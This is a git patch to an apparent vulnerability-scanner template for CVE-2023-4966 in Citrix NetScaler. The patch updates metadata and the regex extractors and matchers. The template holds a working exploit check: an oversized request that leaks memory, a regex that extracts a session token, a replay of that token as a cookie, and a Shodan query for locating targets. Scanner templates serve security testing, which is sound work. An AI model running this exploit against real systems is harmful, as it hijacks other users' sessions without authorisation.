From 349183fafc2e812b052375295f1397fa68eb9bca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 18 Nov 2023 15:43:37 +0530 Subject: [PATCH] Update CVE-2023-4966.yaml --- http/cves/2023/CVE-2023-4966.yaml | 25 +++++++------------------ 1 file changed, 7 insertions(+), 18 deletions(-) diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index cd96a7de238..de962e2e0fc 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo epss-score: 0.92267 - epss-percentile: 0.98699 + epss-percentile: 0.98701 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" @@ -26,7 +26,8 @@ info: vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" - tags: cve,2023,citrix,adc,info-leak,kev + tags: cve,cve2023,citrix,adc,info-leak,kev,exposure + variables: payload: '{{repeat("a", 24812)}}' str: "{{to_lower(rand_text_alpha(4))}}" @@ -42,41 +43,29 @@ http: POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1 Host: {{Hostname}} Cookie: NSC_AAAC={{session}} - User-Agent: python-requests/2.25.1 - Accept-Encoding: gzip, deflate, br - Accept: */* - Connection: close - Content-Length: 0 - unsafe: true - extractors: - type: regex name: session part: body_1 group: 1 regex: - - \b([a-f0-9]{65})\b + - '([a-f0-9]{100}45525d5f4f58455e445a4a42)' internal: true - type: regex part: body_2 regex: - - '([a-z0-9]+)' + - '([a-z0-9._]+)' matchers-condition: and matchers: - type: word - part: body_1 words: - 'NSC_AAAC=' - - '{"issuer":' - condition: and + - 'HTTP/1.1' - type: word - part: header_2 words: - - "text/plain" - -# digest: 490a0046304402207db62b78d725e5835d539a432bbaa606647070f975c036210b895293b64bddc40220565ccd7d916d95908b020076aa1c8c751cf93be538acee8aa9c5b72e7e9346fd:922c64590222798bb761d5b6d8e72950 + - '{"issuer":'